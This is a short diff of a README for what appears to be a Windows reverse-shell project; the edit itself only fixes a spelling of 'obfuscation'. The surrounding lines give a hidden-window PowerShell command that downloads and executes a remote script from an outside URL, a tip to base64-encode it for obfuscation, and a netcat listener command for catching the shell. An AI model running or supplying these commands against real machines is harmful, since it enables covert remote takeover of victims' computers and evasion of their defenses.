Slluxx/Windows-Reverse-Shell/README.md

 `powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString('http://myurl.com/script.php?i=xxx.xxx.xxx&p=xxxx')"`

-To create a layer of obsucation, you can encrypt this string in base64 on sites [like these](https://raikia.com/tool-powershell-encoder/).
+To create a layer of obfuscation, you can encrypt this string in base64 on sites [like these](https://raikia.com/tool-powershell-encoder/).
 Make sure to read the notes down below!

 You can listen to the shell by using `nc -nlvp PORT`.
 You need to have nc (netcat) installed and change `PORT` to whatever port you made the "client" ping to.